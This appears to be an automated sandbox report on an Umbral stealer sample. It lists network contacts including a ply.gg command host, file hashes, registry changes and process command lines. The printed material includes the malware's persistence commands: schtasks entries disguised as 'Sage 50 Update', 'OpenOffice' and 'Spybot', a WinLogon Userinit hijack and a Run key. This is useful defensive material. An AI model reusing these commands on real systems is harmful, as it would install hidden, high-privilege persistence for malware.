SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 147.185.221.20:22470 | course-sr.gl.at.ply.gg | tcp |
| US | 147.185.221.20:22470 | course-sr.gl.at.ply.gg | tcp |
| US | 147.185.221.20:22470 | course-sr.gl.at.ply.gg | tcp |
| US | 147.185.221.20:22470 | course-sr.gl.at.ply.gg | tcp |
Files
memory/1952-0-0x000007FEF59D3000-0x000007FEF59D4000-memory.dmp
memory/1952-1-0x0000000001300000-0x0000000001356000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
| MD5 | 6787e0a40d568fa795d5f161b6643319 |
| SHA1 | f2a25997405ae299f1f0b79a14b428576c2222cb |
| SHA256 | c48fdb6d13f7a2a778a646aaaf2cba2ddf9f2cf523ff1f700185213057116ee6 |
| SHA512 | 66eaa3d8b524e3cb9d3f3d40034f8321f24c1b5ed77e8039f5682116776edfd59519f2aefa7cb8b35e5939dfaf744197abf0c0a85067ac98ff6cb4d289e38a91 |
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
| MD5 | dc8cfe903cd39191e93c5003568f75e9 |
| SHA1 | 8406d466aba0fa4dcd59ae3059d8dc393e77e25d |
| SHA256 | 4068e0955554c872492cb955ae63e983a57db97c43966af5e73feb5618c44486 |
| SHA512 | a55117aa65c1bb4a5230da4aa4661e99a1c80163938230d752c3442173c90f6e5f2abd630fc8b09b9f14eb75da9f355c19f3bd37845fa8efc0f625b2b1506407 |
memory/2324-13-0x0000000000F50000-0x0000000000FC2000-memory.dmp
memory/2988-12-0x0000000000D50000-0x0000000000D90000-memory.dmp
memory/1952-14-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp
memory/2324-15-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp
memory/2656-20-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2656-21-0x0000000001F70000-0x0000000001F78000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d52cd817264e1d030e853088e40be38c |
| SHA1 | 52b92534439bf671109b035832293868981050d4 |
| SHA256 | 362957213c466d66e1d73b4d876d2bbc37086488e3da625ddf2b5b35ee4d18bf |
| SHA512 | 29206012489c7145d737b2b6d52d005d6e9beb3897f7503a1aadb84d3ee382c19275bc1086ad133ccd0552faadf70ff51b24ab23b0126a2949543afe26d05e80 |
memory/2992-27-0x000000001B750000-0x000000001BA32000-memory.dmp
memory/2992-28-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2784-42-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2784-43-0x0000000002860000-0x0000000002868000-memory.dmp
C:\Windows\xdwd.dll
| MD5 | 16e5a492c9c6ae34c59683be9c51fa31 |
| SHA1 | 97031b41f5c56f371c28ae0d62a2df7d585adaba |
| SHA256 | 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66 |
| SHA512 | 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6 |
memory/2264-97-0x000007FEF29F0000-0x000007FEF2A12000-memory.dmp
memory/1956-98-0x000007FEF29F0000-0x000007FEF2A12000-memory.dmp
memory/2508-99-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2324-100-0x0000000000A70000-0x0000000000A7C000-memory.dmp
memory/2928-122-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2872-125-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2956-150-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1596-151-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2324-157-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp
memory/708-176-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2144-177-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1560-207-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1792-210-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/3036-233-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2272-232-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2524-260-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1052-266-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1104-288-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1296-289-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1812-321-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/784-322-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1612-349-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2448-350-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2736-373-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2744-372-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2440-405-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2700-406-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1896-429-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1684-428-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2776-461-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2208-462-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2824-486-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1204-485-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2060-513-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1472-519-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2464-541-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/408-542-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2240-574-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1712-575-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2244-598-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1612-597-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2184-630-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2928-631-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2800-653-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1996-654-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1256-681-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1076-687-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2780-710-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2080-709-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1204-737-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2276-743-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1308-766-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1484-765-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1636-793-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2832-799-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1128-821-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1240-822-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1520-849-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2304-850-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1776-878-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2312-877-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2960-905-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/876-906-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2652-934-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2432-933-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/1896-961-0x000007FEF2560000-0x000007FEF2582000-memory.dmp
memory/2324-1027-0x0000000000A90000-0x0000000000A9C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe
| MD5 | d91fb6867df7e4303d98b5e90faae73c |
| SHA1 | 496f53ad8cd9381f1c1b577a73e978081002c1db |
| SHA256 | bb19b002df31e1196b4e6530cf54c449e9cf1383d3adc5334a0442fa96b36344 |
| SHA512 | 5dbcfe9bf567c6f1e18027950726af1835ab8b363ba8b040fd379b4cfe94b0894bc969b3c04fa4f1964b441a7b894bd4d37f3aabe3ea31396687a6ca093cfdc9 |
memory/3056-1038-0x0000000001100000-0x0000000001122000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-18 10:28
Reported
2024-06-18 10:30
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Documents\\xdwdDiscord.exe" | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Umbral
Event Triggered Execution: AppInit DLLs
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaroB.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Program Files\\xdwdSkype.exe" | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\xdwdSkype.exe | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| File opened for modification | C:\Program Files\xdwdSkype.exe | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\xdwd.dll | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631801185758067" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\SYSTEM32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe"
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Spybot - Search & Destroy" /tr "C:\Program Files\xdwdSkype.exe" /RL HIGHEST & exit
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo 5 /tn "Spybot - Search & Destroy" /tr "C:\Program Files\xdwdSkype.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeca12ab58,0x7ffeca12ab68,0x7ffeca12ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3016 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4220 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4792 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4652 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4588 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2428 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1332 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
